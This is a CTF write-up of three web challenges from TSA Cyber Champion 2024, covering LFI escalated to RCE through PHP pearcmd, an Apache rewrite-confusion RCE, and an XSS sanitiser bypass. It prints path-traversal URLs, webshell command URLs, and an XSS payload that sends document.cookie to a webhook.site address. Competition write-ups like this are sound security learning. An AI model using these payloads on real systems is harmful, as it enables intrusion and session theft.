# Description
CTF write up for TSA Cyber Champion CTF 2024. I took part in this CTF Competition with team "njir zeta wangy banget".
This write up only contains the Website Exploitation challenges (3 out of 4 solved), we managed to 7th out of 238 teams.
Thanks to @daffainfo, @HyggeHalcyon, and @Dmcr, who's has participate with me.
[toc]
# 101 - Web Exploitation
> Web Hacking 101
URL: https://cyberchampion-web-101.chals.io/
Mirror: http://103.196.154.155:20000/
Author: Fedra
## TL;DR
LFI to Pearcmd RCE.
## Solve
We got a website like this.
There a PING and File Upload feature, but we gonna skip that cause likely our solve is unintended.
We notice there a parameter like this if we move to other page.
```
https://cyberchampion-web-101.chals.io/index.php?page=ping.php
```
Then we try to do LFI.
```
https://cyberchampion-web-101.chals.io/index.php?page=../../../../../etc/passwd
```
Successfully got the LFI, now we have two method for escalate this vulnerability.
1. Log Poisoning -> RCE
2. Pearcmd abuse -> RCE
Since the website was using apache, i try to access the log and it got permission denied.
Then we try the option two `Pearcmd` with using this reference.
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/File%20Inclusion/README.md#lfi-to-rce-via-php-pearcmd
Spawned a shell
then access it like this
```
https://cyberchampion-web-101.chals.io/index.php?page=../../../../../var/www/html/tol.php&c=ls+/
```
Since the RCE is success, we can get the flag.
```
TSA{Web_Hacking_101_c7319b0bd96f9d01981bbf52ebb7027f}
```
# File Not Found v2
> Author: dimas
Mudah untuk yg bisa, sulit utk yg tdk bisa Flag di /readflag -> /root/flag.txt
URL: http://playground.tcp1p.team:51669
## TL;DR
Apache misconfiguration lead to RCE.
## Solve
We got a website that's likely static like this.
Then we had a some interesting parameter on
```
http://playground.tcp1p.team:51669/cdn/?file=style.css
```
Which is we could to LFI on these parameter.
Since we got the challenge as a blackbox, we little bit confuse at this stage.
Because not like the previous challenge which is use `include` function, this challenge was using `file_get_contents` that's why we can't using pearcmd again.
Then after search about the apache config (because the website using apache), we found this.
```
<VirtualHost *:80>
ServerAdmin webmaster@localhost
LogLevel alert rewrite:trace3
DocumentRoot /var/www/html/
<Directory />
Require all granted
</Directory>
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
RewriteEngine On
RewriteRule ^/cdn/?$ /cdn.php [QSA,L]
RewriteRule ^/(.*)/$ /$1.html [QSA,END]
</VirtualHost>
```
And we found a reference, that's likely solution for this challenge.
https://blog.orange.tw/posts/2024-08-confusion-attacks-en/#%F0%9F%94%A5-2-DocumentRoot-Confusion
That's rule mean for example if access `http://playground.tcp1p.team:51669/about/` those server will search `about.html` and `/var/www/html/about.html`.
To testing what we find, we do using some file from `/usr/share` like this.
```
http://playground.tcp1p.team:51669/usr/share/apache2/default-site/index/
```
From this we able to using `pearcmd` again to spawn a shell.
Do access like this
```
http://playground.tcp1p.team:51669/dev/shm/mentorz.php%3f/?c=ls+/
```
Then read the flag.
```
TSA{cyber_strike_web_problem_2.0}
```
# Eksploitasi Kerentanan XSS v2
> Website: http://playground.tcp1p.team:23218
Botnya mana?
Bot: http://playground.tcp1p.team:7719
Source : [xss.zip](https://drive.google.com/file/d/1S_D6sBHgf3uTtn4tADOnbUEZkoBaZVrj/view?usp=sharing)
## TL;DR
XSS with using C-DATA payload (unintended).
## Solve
We got a website that's has XSS vulnerable inside it, but when we read the source-code it was hell yeah :joy:
```javascript
<script src="https://cdnjs.cloudflare.com/ajax/libs/dompurify/3.1.2/purify.min.js"></script>
<script>
function normalize(s) {
return new Promise((resolve, _) => {
const frame = document.createElement("iframe");
frame.sandbox = 'allow-same-origin';
frame.hidden = true;
frame.srcdoc = s;
document.body.appendChild(frame);
setTimeout(() => {
const nestedFrames = frame.contentWindow.document.querySelectorAll("iframe");
nestedFrames.forEach(nestedFrame => nestedFrame.remove());
const content = frame.contentWindow.document.body.innerHTML;
document.body.removeChild(frame);
if (content.toLowerCase().includes("srcdoc")) resolve("");
resolve(content);
}, 1000);
});
}
async function main() {
const url = new URL(location)
const html = url.searchParams.get("html")
if (html) {
document.getElementById("parameterInput").value = html
document.getElementById("html").innerHTML = await normalize(DOMPurify.sanitize(html))
}
}
main()
</script>
```
Like there no hope, but we find some similar challenge.
https://github.com/ImaginaryCTF/ImaginaryCTF-2023-Challenges/tree/main/Web/sanitized
Since the challenge is also using `xhtml`, which is already explained on the github as solution.
Then we can modified the solver payload, like this:
```
<div><style><![CDATA[</style><div data-x="]]></style><img src='x' onerror='alert()'/><style><!--"></div><style>--></style></div>
```
And boom!, we got pop up appear.
Change to our webhook, like this:
```
<div><style><![CDATA[</style><div data-x="]]></style><img src='x' onerror='location.replace(`https://webhook.site/4c2e277e-259d-462f-86cb-b457f59e7c09/?x`+document.cookie)' /><style><!--"></div><style>--></style></div>
```
And send to the bot, don't forget to change the domain since the flag domain is `http://server/`.
We got the flag.
```
TSA{connection_pool_manipulation_to_get_xss}
```
Sign in with Wallet
Connect another wallet